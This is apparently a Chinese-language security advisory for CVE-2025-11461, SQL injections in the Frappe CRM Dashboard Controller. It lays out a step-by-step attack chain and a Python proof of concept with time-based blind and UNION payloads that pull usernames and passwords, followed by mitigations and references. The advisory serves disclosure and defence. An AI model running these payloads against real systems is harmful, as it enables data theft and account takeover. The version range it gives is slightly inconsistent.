CVE-2025-11461: Frappe CRM Dashboard Controller多个SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11461

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frappe CRM

漏洞概述

CVE-2025-11461是Frappe CRM中发现的一个高危安全漏洞，CVSS评分高达8.8。该漏洞属于Multiple SQL Injections（多个SQL注入）类型，存在于Frappe CRM的Dashboard Controller组件中。漏洞的根本原因是开发人员在构建动态SQL查询时，不安全地将用户控制的参数直接拼接到SQL语句中，导致攻击者可以通过构造恶意输入来操纵SQL查询逻辑。这是一个严重的安全问题，因为它允许未经授权的数据库访问，可能导致敏感数据泄露、数据篡改甚至在某些情况下实现远程代码执行。漏洞影响Frappe CRM 1.53.1版本，攻击者仅需拥有低权限账户即可发起攻击，无需用户交互即可成功利用。

技术细节

该漏洞存在于Frappe CRM的Dashboard Controller中，具体表现为多处动态SQL语句构建时的参数处理不当。攻击者可以通过HTTP请求中的特定参数注入恶意SQL代码片段。由于SQL查询直接使用用户输入而未经过充分的参数化或转义处理，攻击者可以突破原始查询的逻辑边界，执行任意SQL命令。常见的攻击手段包括：1）使用UNION SELECT语句提取数据库中的敏感信息，如用户凭证、管理员会话等；2）使用BENCHMARK或SLEEP函数进行基于时间的盲注测试，以推断数据库内容；3）使用UPDATE或DELETE语句修改或删除关键数据。攻击者利用此漏洞需要先在Frappe CRM系统中拥有一个低权限用户账户，然后通过Dashboard功能点发送精心构造的请求即可触发SQL注入。由于CVSS向量显示攻击复杂度低且无需特殊权限，该漏洞极易被利用。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统是否使用Frappe CRM，并确定版本是否为1.53.1。通过访问公开的CVE数据库和GitHub仓库获取漏洞详情和修复信息。

STEP 2

步骤2: 获取低权限账户

攻击者需要获得一个有效的Frappe CRM用户账户（任何低权限账户即可）。可以通过注册新账户、社会工程学或其他方式获取。

STEP 3

步骤3: 识别注入点

攻击者访问Dashboard Controller相关的API端点，识别可被注入的参数。常见的注入点包括dashboard_name、filters、group_by等用户可控参数。

STEP 4

步骤4: 构造恶意Payload

根据识别的注入点，构造包含SQL注入代码的恶意请求。常用的payload包括：UNION SELECT进行联合查询注入、时间盲注（SLEEP/BENCHMARK）、布尔盲注等。

STEP 5

步骤5: 执行攻击并提取数据

发送恶意构造的HTTP请求到Dashboard Controller，触发SQL注入漏洞。通过分析响应或响应时间推断数据库内容，逐步提取敏感数据如用户凭证、配置文件等。

STEP 6

步骤6: 权限提升与持久化

获取数据库中的管理员凭证后，攻击者可以尝试登录管理后台获取更高权限。部分情况下可通过SQL注入直接写入文件实现远程代码执行（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11461 PoC - Frappe CRM SQL Injection # Discovered by: [email protected] import requests import json TARGET_URL = "https://target-site.com/api/method/crm.api.dashboard.get" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Authenticate to Frappe CRM and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL.rsplit('/', 1)[0]}/api/method/login" data = { "usr": USERNAME, "pwd": PASSWORD } response = session.post(login_url, data=data) return session if response.status_code == 200 else None def exploit_sql_injection(session): """Exploit SQL injection in dashboard parameter""" # Malicious payload to extract database version # This demonstrates blind SQL injection technique payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--" headers = { "Content-Type": "application/json" } # Target vulnerable parameter in dashboard controller params = { "dashboard_name": payload, "refresh": "1" } try: response = session.get(TARGET_URL, params=params, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection confirmed - time-based blind injection works") return True except requests.exceptions.Timeout: print("[+] SQL Injection confirmed - request timed out as expected") return True return False def extract_data(session): """Extract sensitive data using UNION-based injection""" # UNION injection to extract users table data union_payload = "1' UNION SELECT NULL,username,password,email,NULL,NULL,NULL,NULL FROM __Auth--" params = { "dashboard_name": union_payload, "refresh": "1" } response = session.get(TARGET_URL, params=params) if response.status_code == 200: print("[+] Data extraction successful") print(f"Response: {response.text}") return response.json() return None if __name__ == "__main__": print("[*] CVE-2025-11461 - Frappe CRM SQL Injection Tester") print("[*] Target: Frappe CRM Dashboard Controller") session = login() if session: print("[+] Login successful") if exploit_sql_injection(session): print("[+] Vulnerability confirmed!") # Uncomment to extract data: # extract_data(session) else: print("[-] Authentication failed")

影响范围

Frappe CRM < 1.53.1

Frappe CRM 1.53.1 (受影响)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制Dashboard功能的访问权限，仅允许受信任的管理员使用；2）在Web应用层实施严格的输入验证，过滤SQL特殊字符如单引号、双引号、分号等；3）配置数据库防火墙规则，限制应用程序账户的权限；4）启用详细的访问日志和告警机制，及时发现异常查询行为；5）考虑临时禁用非必要的Dashboard功能以减少攻击面。建议持续关注Frappe官方安全公告，及时应用安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11461
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11461
3 Details https://www.cvedetails.com/cve/CVE-2025-11461/
4 VulDB https://vuldb.com/cve/CVE-2025-11461
5 Link https://fluidattacks.com/advisories/oz
6 Link https://github.com/frappe/crm
7 Link https://github.com/frappe/crm/pull/1339
8 Link https://fluidattacks.com/advisories/oz
9 Link https://github.com/frappe/crm